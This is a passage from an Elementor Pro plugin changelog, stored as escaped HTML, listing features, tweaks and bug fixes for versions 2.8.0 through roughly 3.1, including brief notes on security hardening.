repeater in Form widget (<a href=\\\"https:\\/\\/developers.elementor.com\\/how-to-add-a-repeater-control-to-elementor-add-on\\/\\\">Developer Documentation<\\/a>)<\\/li>\\n<li>Tweak: Added "Show on Browsers" Popup Advanced Rule<\\/li>\\n<li>Tweak: Added real-time JS handling to prevent redundant renders in Slides widget and all Carousel widgets<\\/li>\\n<li>Tweak: Import scroll utility from core and remove it from Pro<\\/li>\\n<li>Tweak: Added alignment options for Post Excerpt widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9757\\\">#9757<\\/a>)<\\/li>\\n<li>Tweak: Changed alignment control to work with selectors in Share Buttons<\\/li>\\n<li>Tweak: Upgraded to Webpack 5, Grunt-Webpack 4 and TerserPlugin instead of UglifyJsPlugin<\\/li>\\n<li>Fix: Steps Divider is not vertically aligned in Multi Step Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12569\\\">#12569<\\/a>)<\\/li>\\n<li>Fix: Slides are playing in an infinite loop mode even when the option is disabled in Slides Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6726\\\">#6726<\\/a>)<\\/li>\\n<li>Fix: Redundant spacing is added to Share Buttons widget<\\/li>\\n<li>Fix: Step buttons text is not updated without a page reload in Forms widget<\\/li>\\n<li>Fix: Overflow issue in certain animations in Animated Headline widget<\\/li>\\n<li>Fix: When dragging a new Testimonial Carousel there is a console error thrown<\\/li>\\n<li>Fix: Step Buttons are cut in mobile view in Multi Step Form<\\/li>\\n<li>Fix: Submit and Step buttons size differences when using Twenty Twenty theme<\\/li>\\n<li>Fix: Duplicate button Text Color control in Slides widget<\\/li>\\n<li>Fix: JS error is thrown when editing and saving global widgets<\\/li>\\n<li>Fix: <code>get_version<\\/code> API function may fail with Redis \\/ DB cache<\\/li>\\n<li>Fix: Multiple license check requests are created in certain cases<\\/li>\\n<li>Deprecated: Deprecate methods prefixed with an underscore and replace them with unprefixed methods<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-1-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>3.0.10 - 2021-01-20<\\/h4>\\n<ul>\\n<li>Tweak: Added Editing Handles string translation compatibility with Elementor v3.1.0<\\/li>\\n<\\/ul>\\n<h4>3.0.9 - 2020-12-29<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility to support Elementor 3.1.0<\\/li>\\n<li>Fix: Wrong phrasing of Import template success message in Theme Builder<\\/li>\\n<li>Fix: Border color glitch in Theme Builder<\\/li>\\n<\\/ul>\\n<h4>3.0.8 - 2020-11-26<\\/h4>\\n<ul>\\n<li>Fix: Navigation arrows UI glitch in Media Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13172\\\">#13172<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.0.7 - 2020-11-25<\\/h4>\\n<ul>\\n<li>Fix: Console Error when dragging Testimonials Carousel widget<\\/li>\\n<li>Fix: Arrows of Testimonial and Reviews Carousel widgets navigate to the wrong direction in RTL websites<\\/li>\\n<li>Fix: Removed the conditional loading of Webpack<\\/li>\\n<li>Fix: Fatal error is thrown after deleting an associated custom taxonomy when Posts widget with Cards skin has a badge<\\/li>\\n<li>Fix: Upload JSON files only when the user allowed to prevent security issues<\\/li>\\n<li>Fix: Gallery not displayed in Theme Builder templates preview<\\/li>\\n<\\/ul>\\n<h4>3.0.6 - 2020-11-04<\\/h4>\\n<ul>\\n<li>Tweak: Updated the embedded post in Facebook Embed widget<\\/li>\\n<li>Fix: Minor UI glitches in Theme Builder's conditions screen footer<\\/li>\\n<li>Fix: Template type changes into Single Page after conditions change in Theme Builder<\\/li>\\n<li>Fix: Redundant Custom Caption option in Site Logo widget<\\/li>\\n<li>Fix: Removed unused code in Drip integration<\\/li>\\n<li>Fix: Removed Weibo and WeChat social networks due to website and links inactivity from Share Buttons widget<\\/li>\\n<li>Fix: Removed redundant code from Portfolio and Post Navigation widgets<\\/li>\\n<\\/ul>\\n<h4>3.0.5 - 2020-09-23<\\/h4>\\n<ul>\\n<li>Fix: If the default page layout is set to "Canvas" Headers and Footers cannot be edited<\\/li>\\n<li>Fix: Product Image Dynamic Tag throws an error when no image is set<\\/li>\\n<li>Fix: Missing Single document placeholder in Theme Builder<\\/li>\\n<li>Fix: Document editing handles inherit the <code>font-family<\\/code> from 3rd party source<\\/li>\\n<li>Fix: Can't add linebreaks to Textarea input when used as Multi Step Form<\\/li>\\n<li>Fix: Incorrect width in Facebook Page widget<\\/li>\\n<li>Fix: Added compatibility to allow the use of 'get_create_url' in Theme Builder<\\/li>\\n<\\/ul>\\n<h4>3.0.4 - 2020-09-09<\\/h4>\\n<ul>\\n<li>Fix: Autogenerated screenshots appear in WP Media Library modal (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12304\\\">#12304<\\/a>)<\\/li>\\n<li>Fix: Make sure Elementor Posts widget Pagination doesn't interfere with 3rd party plugins (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12126\\\">#12126<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12127\\\">#12127<\\/a>)<\\/li>\\n<li>Fix: Shrinking conditions indicator in Theme Builder<\\/li>\\n<li>Fix: Column can't be dragged and dropped if it populates a Global widget<\\/li>\\n<li>Fix: Styles are missing from Single templates in some edge cases<\\/li>\\n<\\/ul>\\n<h4>3.0.3 - 2020-09-02<\\/h4>\\n<ul>\\n<li>Fix: Pagination doesn't work in WordPress 5.5 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12126\\\">#12126<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12127\\\">#12127<\\/a>)<\\/li>\\n<li>Fix: Change delete template action to "Move to Trash" in the new Theme Builder view<\\/li>\\n<\\/ul>\\n<h4>3.0.2 - 2020-08-31<\\/h4>\\n<ul>\\n<li>Tweak: Replaced WordPress "Learn More" links with dynamic links for better control over time (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12312\\\">#12312<\\/a>)<\\/li>\\n<li>Tweak: UI tweaks to the Conditions screen In the new Theme Builder<\\/li>\\n<li>Fix: Motion Effects not working when assigned to a column and throws JS error when DOM optimization is disabled (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12299\\\">#12299<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12275\\\">#12275<\\/a>)<\\/li>\\n<li>Fix: Multiple Galleries display all the images in the Lightbox slideshow (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11809\\\">#11809<\\/a>)<\\/li>\\n<li>Fix: Old Theme Builder is being opened when accessing through the Finder<\\/li>\\n<li>Fix: Mixed templates import glitch in Theme Builder<\\/li>\\n<li>Fix: Card icon sizes in Theme Builder<\\/li>\\n<li>Fix: Preview button leads to <code>render_mode<\\/code> instead of preview when importing a template from the new Theme Builder<\\/li>\\n<\\/ul>\\n<h4>3.0.1 - 2020-08-26<\\/h4>\\n<ul>\\n<li>Tweak: Keep previous Theme Builder when accessing from the WP Dashboard for legacy support<\\/li>\\n<li>Tweak: Updated video tutorials in Theme Builder<\\/li>\\n<li>Tweak: Don't show auto-screenshots in the Media Library (Props <a href=\\\"https:\\/\\/github.com\\/black-eye\\\">@black-eye<\\/a>)<\\/li>\\n<li>Fix: Repeater items throws <code>childView<\\/code> is undefined message in Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12239\\\">#12239<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12221\\\">#12221<\\/a>)<\\/li>\\n<li>Fix: Misspelling of the word "occurred" in Form widget default error message (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12137\\\">#12137<\\/a>)<\\/li>\\n<li>Fix: Facebook comments not showing up (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12157\\\">#12157<\\/a>)<\\/li>\\n<li>Fix: Check for conflicts in Theme Builder doesn't work properly<\\/li>\\n<li>Fix: Minor UI fixes in Theme Builder<\\/li>\\n<li>Fix: Dark mode glitches in Theme Builder<\\/li>\\n<li>Fix: Global Site Part toaster appears when you publish a Popup<\\/li>\\n<li>Fix: Site Parts aren't in the correct order in Theme Builder<\\/li>\\n<li>Fix: Date field caused forms to get corrupted in Forms widget<\\/li>\\n<li>Fix: Theme Builder application page is forbidden<\\/li>\\n<\\/ul>\\n<h4>3.0.0 - 2020-08-23<\\/h4>\\n<ul>\\n<li>New: Introducing the new and improved Theme Builder<\\/li>\\n<li>Tweak: Removed <code>.elementor-inner<\\/code> and <code>.elementor-column-wrap<\\/code> from DOM output to improve performance (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7351\\\">#7351<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7817\\\">#7817<\\/a>, <a href=\\\"https:\\/\\/developers.elementor.com\\/dom-improvements-ahead-html-wrappers-removal-from-v3-0\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added contextual anchors ID support to Table of Contents widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10052\\\">#10052<\\/a>)<\\/li>\\n<li>Tweak: Added WeChat and Weibo social networks to Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11554\\\">#11554<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities for Redirect after Login\\/Logout in Login widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11343\\\">#11343<\\/a>)<\\/li>\\n<li>Tweak: Added Blend Mode and CSS Filters controls to adjust the Background Overlay in Flipbox widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11653\\\">#11653<\\/a>)<\\/li>\\n<li>Tweak: Added responsive capabilities to Toggle Button styling in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8269\\\">#8269<\\/a>)<\\/li>\\n<li>Tweak: Added responsive Text Alignment control in Call to Action widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11968\\\">#11968<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic content to Ribbon element in Call to Action widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10364\\\">#10364<\\/a>)<\\/li>\\n<li>Tweak: Converted uses of Color and Typography Schemes to Global Colors and Fonts<\\/li>\\n<li>Tweak: Separated Title and Description control fields labels in Call to Action widget<\\/li>\\n<li>Tweak: Removed unnecessary style in WC Product with variations<\\/li>\\n<li>Tweak: Converted Portfolio, Posts and Share Buttons widgets to use CSS Variable-based Elementor Grid (<a href=\\\"https:\\/\\/developers.elementor.com\\/elementor-dropping-support-ie\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added Date Modified option to Posts widget metadata<\\/li>\\n<li>Fix: PHP 7.4 compatibility to Media Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11355\\\">#11355<\\/a>)<\\/li>\\n<li>Fix: Divider alignment issue in Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11628\\\">#11628<\\/a>)<\\/li>\\n<li>Fix: Color doesn\\u2019t change in Products Archive Description widget<\\/li>\\n<li>Fix: WC Product variations layout breaks when using Variation Swatches plugin<\\/li>\\n<li>Fix: WC Product variations layout issue<\\/li>\\n<li>Fix: WC Product variations mobile zoom-in glitch<\\/li>\\n<li>Fix: Can't edit a Popup after accessing Theme Style<\\/li>\\n<li>Fix: Twitter icon missing in Blockquote widget<\\/li>\\n<li>Fix: Removed redundant default text color from Share Buttons minimal skin<\\/li>\\n<li>Fix: UI glitch in Display Conditions modal<\\/li>\\n<li>Fix: Insert template button UI glitch in Templates Library<\\/li>\\n<li>Fix: Added sanitization to post titles in WordPress dashboard for better security<\\/li>\\n<li>Fix: Show when arriving from search engines rule doesn't work in Popup<\\/li>\\n<li>Fix: Child categories are shown with a different parent category in Query control<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-0-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>2.10.3 - 2020-06-29<\\/h4>\\n<ul>\\n<li>Fix: Form not being submitted when using "Progress Bar" and "None" view types in Multi Step Form (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11596\\\">#11596<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11610\\\">#11610<\\/a>)<\\/li>\\n<li>Fix: Missing "for" attribute in Password field label in Login widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8646\\\">#8646<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.10.2 - 2020-06-16<\\/h4>\\n<ul>\\n<li>Fix: Run step events only when in Multi Step Form mode (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11644\\\">#11644<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.10.1 - 2020-06-16<\\/h4>\\n<ul>\\n<li>Tweak: Improved License validation mechanism to avoid limitations<\\/li>\\n<li>Tweak: Changed control labels and ordering in Price Table, Lottie and Form widgets<\\/li>\\n<li>Fix: Popup close button vertical position glitch (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10921\\\">#10921<\\/a>)<\\/li>\\n<li>Fix: Radio field placement glitch when in Multi Step mode in Form widget<\\/li>\\n<li>Fix: Clicking <code>Enter<\\/code> key submits the form in Multi Step Form<\\/li>\\n<li>Fix: Hardened sanitization in Custom Attributes to avoid security issues<\\/li>\\n<\\/ul>\\n<h4>2.10.0 - 2020-06-07<\\/h4>\\n<ul>\\n<li>New: Introducing Multi-Step Forms - Breakdown long forms into simple steps (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5975\\\">#5975<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3911\\\">#3911<\\/a>)<\\/li>\\n<li>New: Introducing Lottie widget - easily add Lottie animations to your site, no coding needed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11026\\\">#11026<\\/a>)<\\/li>\\n<li>Tweak: Added spacing option to Posts widget pagination (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5682\\\">#5682<\\/a>)<\\/li>\\n<li>Tweak: Changed texts and logic for administrator plugin renewal notices<\\/li>\\n<li>Tweak: Added new Scroll Util for improved scrolling handling<\\/li>\\n<li>Tweak: Improved Motion Effects animation performance<\\/li>\\n<\\/ul>\\n<h4>2.9.5 - 2020-05-24<\\/h4>\\n<ul>\\n<li>Fix: Added sanitization to Custom Attributes control to avoid security issue<\\/li>\\n<\\/ul>\\n<h4>2.9.4 - 2020-05-07<\\/h4>\\n<ul>\\n<li>Fix: Hardened user role that is allowed to upload icon sets and unzip only allowed files in Custom Icons to prevent security vulnerability<\\/li>\\n<\\/ul>\\n<h4>2.9.3 - 2020-04-19<\\/h4>\\n<ul>\\n<li>Fix: Form shortcode IDs are not wrapped in double-quotes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11023\\\">#11023<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10932\\\">#10932<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10967\\\">#10967<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11000\\\">#11000<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11049\\\">#11049<\\/a>)<\\/li>\\n<li>Fix: Escaped Form records metadata to prevent security vulnerability<\\/li>\\n<li>Fix: Closing "Save Changes" document confirmation modal causes Panel infinite loading<\\/li>\\n<li>Fix: Ken Burns effect not working when there is only one slide in Slides widget<\\/li>\\n<li>Fix: Document handles UI glitch<\\/li>\\n<\\/ul>\\n<h4>2.9.2 - 2020-03-25<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility with WordPress v5.4 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10745\\\">#10745<\\/a>)<\\/li>\\n<li>Fix: Image ratio number is displayed under the Archive Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10874\\\">#10874<\\/a>)<\\/li>\\n<li>Fix: Theme Style Link color setting overrides the Table of Content list style<\\/li>\\n<li>Fix: PHP notice when using dynamic user info <code>id<\\/code><\\/li>\\n<li>Fix: Navigation arrows direction is crossed on first drag in Slides Widget<\\/li>\\n<li>Fix: "No headings were found on this page" message was not displayed in the frontend in Table of Contents widget<\\/li>\\n<li>Fix: Container includes Popup tags by default in Table of Contents widget<\\/li>\\n<li>Fix: Twitter icon display issue when Font Awesome 4 support is disabled in Blockquote widget<\\/li>\\n<li>Fix: ACF Dynamic tag not working in Form widget Redirect action<\\/li>\\n<\\/ul>\\n<h4>2.9.1 - 2020-03-16<\\/h4>\\n<ul>\\n<li>Fix: Can't access Elementor Editor when there is Page Title widget in the page<\\/li>\\n<li>Fix: Applying styling to Post Content widget affects the Page and Post editing handles<\\/li>\\n<\\/ul>\\n<h4>2.9.0 - 2020-03-15<\\/h4>\\n<ul>\\n<li>New: Introducing Full Site Editing: Design header, footer, and content all in one place! (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4985\\\">#4985<\\/a>)<\\/li>\\n<li>New: Added Global Custom CSS for Your Entire Site in Theme Style (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3345\\\">#3345<\\/a>)<\\/li>\\n<li>New: Added Dynamic Colors tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6485\\\">#6485<\\/a>)<\\/li>\\n<li>Tweak: Added option to set the Site Part HTML Wrapper Tags (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9293\\\">#9293<\\/a>)<\\/li>\\n<li>Tweak: Added Link Attributes support to Pro widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5716\\\">#5716<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3642\\\">#3642<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9225\\\">#9225<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9079\\\">#9079<\\/a>)<\\/li>\\n<li>Tweak: Added Theme Style support in Theme Builder parts (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10564\\\">#10564<\\/a>)<\\/li>\\n<li>Tweak: Avoid creating empty Custom Font<\\/li>\\n<li>Tweak: Added <code>aria-expanded<\\/code> attribute to Menu Cart widget<\\/li>\\n<li>Tweak: Moved Link Actions module to Core plugin<\\/li>\\n<li>Tweak: Changed the name of \\u201cTypeKit Web Fonts by Adobe\\u201d to \\u201cAdobe Fonts\\u201d<\\/li>\\n<li>Tweak: Removed redundant display conditions from Blockquote, Flipbox, Price Table, and Search Form widgets<\\/li>\\n<li>Tweak: Pro widgets are not draggable unless Elementor license has been activated<\\/li>\\n<li>Tweak: Remove redundant <code>label_block<\\/code> parameters from several controls<\\/li>\\n<li>Tweak: Converted controls selectors to CSS variables in Gallery widget<\\/li>\\n<li>Tweak: Replaced Stumbleupon with Mix in Reviews widget recommended icons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10099\\\">#10099<\\/a>)<\\/li>\\n<li>Tweak: Added Mix to the Share Buttons network list (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10099\\\">#10099<\\/a>)<\\/li>\\n<li>Tweak: Added "Open in new tab" option to Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7924\\\">#7924<\\/a>)<\\/li>\\n<li>Tweak: Upgraded Font Awesome Pro library to v5.12.0<\\/li>\\n<li>Tweak: Added new Lightbox compatibility for Gallery and Media Carousel widgets<\\/li>\\n<li>Tweak: Expose external API for Swiper instances<\\/li>\\n<li>Tweak: Added compatibility to JS API in Theme Builder, Popups, Form widget and Global widget<\\/li>\\n<li>Tweak: Replaced nerd icons with new Elementor emojis<\\/li>\\n<li>Tweak: Added specific <code>color<\\/code> attribute to header title in Table of Contents widget<\\/li>\\n<li>Fix: Line break issues in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10585\\\">#10585<\\/a>)<\\/li>\\n<li>Fix: Theme Style Link color overrides the Table of Content list style<\\/li>\\n<li>Fix: Active state glitches when using Table of contents widget with Sticky mode<\\/li>\\n<li>Fix: "Graphic Element" section appears as empty in case of unmarked Graphic Element in Call to Action widget<\\/li>\\n<li>Fix: Page Title widget render glitches in the Editor<\\/li>\\n<li>Fix: Image ratio parameter visible in some edge cases in Posts widget<\\/li>\\n<li>Fix: Image missing when sharing to Pinterest using Share Buttons widget<\\/li>\\n<li>Fix: Theme Style Link color setting override the list style in Table of Contents widget<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v2-9-0-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>2.8.5 - 2020-03-08<\\/h4>\\n<ul>\\n<li>Tweak: Added new Swiper parameter to all Pro carousels to allow 3rd party integration<\\/li>\\n<li>Fix: Missing closing bracket in Animated Headline widget<\\/li>\\n<li>Fix: Share buttons widgets show Font Awesome 4 icons on first drag in Editor<\\/li>\\n<\\/ul>\\n<h4>2.8.4 - 2020-02-16<\\/h4>\\n<ul>\\n<li>Tweak: Added Lightbox Title & Description support to Gallery widget<\\/li>\\n<li>Tweak: Added RTL support for Slides widget<\\/li>\\n<li>Tweak: Display Lightbox images in Full size in Gallery widget<\\/li>\\n<li>Fix: Template with Slides widget not working properly when placed inside Tabs, Accordion and Toggle widget<\\/li>\\n<li>Fix: Dropdown menu lost styling after Elementor Pro v2.8 upgrade in Nav Menu widget<\\/li>\\n<li>Fix: Indent doesn't work on RTL websites in Table of Contents widget<\\/li>\\n<li>Fix: Query Control throws <code>Undefined index: q<\\/code> error<\\/li>\\n<li>Fix: Typography control not affecting dropdown menu in Nav Menu widget<\\/li>\\n<li>Fix: Discord forms integration fails to send submissions in some server configurations<\\/li>\\n<li>Fix: Rotating headlines don't align center in Animated Headline widget<\\/li>\\n<li>Fix: Custom secondary color displayed when not needed in Share buttons widget<\\/li>\\n<li>Fix: Motion Effects of certain objects are not functioning properly on Safari browser<\\/li>\\n<li>Fix: Missing eye icon in Single template footer preview button<\\/li>\\n<\\/ul>\\n<h4>2.8.3 - 2020-01-01<\\/h4>\\n<ul>\\n<li>Tweak: Updated Table of Contents widget panel location<\\/li>\\n<li>Fix: ACF URL Dynamic field throws <code>undefined index<\\/code> PHP notice (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9929\\\">#9929<\\/a>)<\\/li>\\n<li>Fix: Gallery lightbox pagination shows images from all tabs<\\/li>\\n<li>Fix: "Reply To" option not working in Form widget "Email 2" Action<\\/li>\\n<li>Fix: ACF Dynamic tag not working in Form widget Redirect action<\\/li>\\n<li>Fix: Underline option not working in Table of Contents widget Normal state<\\/li>\\n<li>Fix: Query Control <code>Undefined index: autocomplete<\\/code> notice in some cases<\\/li>\\n<li>Fix: Missing display condition to Read More Spacing control in Posts widget<\\/li>\\n<\\/ul>\\n<h4>2.8.2 - 2019-12-19<\\/h4>\\n<ul>\\n<li>Tweak: Improved scroll-spy and collapsing functionality in Table of Contents widget<\\/li>\\n<li>Fix: "No products were found" message not being displayed in an empty Products Archive<\\/li>\\n<li>Fix: Redundant <code><br><\\/code> tags in Single theme template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9927\\\">#9927<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9928\\\">#9928<\\/a>)<\\/li>\\n<li>Fix: Draft Popup shows up in Dynamic tag dropdown<\\/li>\\n<\\/ul>\\n<h4>2.8.1 - 2019-12-18<\\/h4>\\n<ul>\\n<li>Fix: Share Buttons widget not working (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9920\\\">#9920<\\/a>)<\\/li>\\n<li>Fix: Redundant <code><p><\\/code> tags added to Single Template posts<\\/li>\\n<\\/ul>\\n<h4>2.8.0 - 2019-12-18<\\/h4>\\n<ul>\\n<li>New: Table of Contents Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5171\\\">#5171<\\/a>)<\\/li>\\n<li>New: Added Font Awesome Pro Duotone font family support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9578\\\">#9578<\\/a>)<\\/li>\\n<li>Tweak: Added Lazy Load option to Gallery widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9763\\\">#9763<\\/a>)<\\/li>\\n<li>Tweak: Added Random order option to Gallery widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9269\\\">#9269<\\/a>)<\\/li>\\n<li>Tweak: Updated Font Awesome Pro to v5.11.2 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9578\\\">#9578<\\/a>)<\\/li>\\n<li>Tweak: Added preselect support for multiple default select values in Forms Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9324\\\">#9324<\\/a>)<\\/li>\\n<li>Tweak: Avoid duplicate queries for Custom Icons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9579\\\">#9579<\\/a>)<\\/li>\\n<li>Tweak: Major performance improvements to Gallery widget<\\/li>\\n<li>Tweak: Avoid non-existing images in Gallery widget<\\/li>\\n<li>Tweak: Added <code>tabindex<\\/code>, <code>aria-expanded<\\/code>, <code>aria-hidden<\\/code> and <code>role="navigation"<\\/code> accessibility attributes to Nav Menu widget<\\/li>\\n<li>Tweak: Changed button HTML tag from <code>button<\\/code> to <code>span<\\/code> in Call to Action and Flip Box widgets for better W3C compliance and accessibility<\\/li>\\n<li>Tweak: Removed Google+ from default networks in Share Buttons widget<\\/li>\\n<li>Tweak: Added compatibility for Library Connect<\\/li>\\n<li>Tweak: Added i18n to Toolset date dynamic tag<\\/li>\\n<li>Tweak: Added external link support to Gallery widget<\\/li>\\n<li>Tweak: Changed the link external attributes implementation to use <code>add_link_attributes()<\\/code> in Gallery widget<\\/li>\\n<li>Tweak: Updated references to the new Schemes system location<\\/li>\\n<li>Tweak: Avoid running Gallery handler when the gallery is empty<\\/li>\\n<li>Tweak: UI Tweaks in Editor Panel<\\/li>\\n<li>Tweak: Added responsive capabilities to Pointer Width control in Nav Menu widget<\\/li>\\n<li>Tweak: Added mobile support for responsive controls in Nav Menu widget<\\/li>\\n<li>Tweak: Refactor <code>register_controls()<\\/code> method in Posts widget skin trait<\\/li>\\n<li>Fix: ACF URL "undefined Index" notice (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7646\\\">#7646<\\/a>)<\\/li>\\n<li>Fix: WooCommerce Mini-Cart widget causes fatal error in edge cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9304\\\">#9304<\\/a>)<\\/li>\\n<li>Fix: <code>PHP Notice: Undefined index<\\/code> display for Author query (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9864\\\">#9864<\\/a>)<\\/li>\\n<li>Fix: Added compatibility for Button widget placed inside Swiper carousel (<a href=\\\"https:\\/\\/wordpress.org\\/support\\/topic\\/broken-buttons-since-elementor-2-8\\/\\\">Topic<\\/a>)<\\/li>\\n<li>Fix: Avoid empty spaces in Post info widget<\\/li>\\n<li>Tweak: Always show "Custom label" control in Login widget<\\/li>\\n<li>Fix: Nav Menu item typography selector in Nav Menu widget<\\/li>\\n<li>Fix: Facebook Like Button widget causes flickering<\\/li>\\n<li>Fix: WooCommerce mini-cart behaviour when using <code>plain<\\/code> permalinks format<\\/li>\\n<li>Fix: Avoid running Popup triggers when set without conditions<\\/li>\\n<li>Fix: Removed "Date" query from Products widget<\\/li>\\n<li>Fix: Slides widget when used as a Shortcode and is hidden<\\/li>\\n<li>Fix: Custom URL being accessed on swipe in Media Carousel<\\/li>\\n<li>Fix: Media Carousel widget Cube effect glitch<\\/li>\\n<li>Fix: Lightbox shows images from multiple Gallery widgets in the same page<\\/li>\\n<li>Fix: Image <code>alt<\\/code> Text not displayed on overlay in Gallery widget<\\/li>\\n<li>Fix: Gallery widget not visible in Posts widget Full Content skin<\\/li>\\n<li>Fix: WooCommerce mini-cart remove unnecessary hooks registration when WooCommerce integration set to <code>Disable<\\/code><\\/li>\\n<li>Fix: Slides widget button wrapping breaks in mobile view<\\/li>\\n<li>Fix: Dynamic capabilities with the Reviews widget<\\/li>\\n<li>Fix: Disabling autoplay doesn't work in Slides widget<\\/li>\\n<li>Fix: Posts widget Full Content skin not working on Single template<\\/li>\\n<li>Fix: Autocomplete not working for "By Author" condition in Display Conditions screen<\\/li>\\n<li>Fix: Posts widget alignment 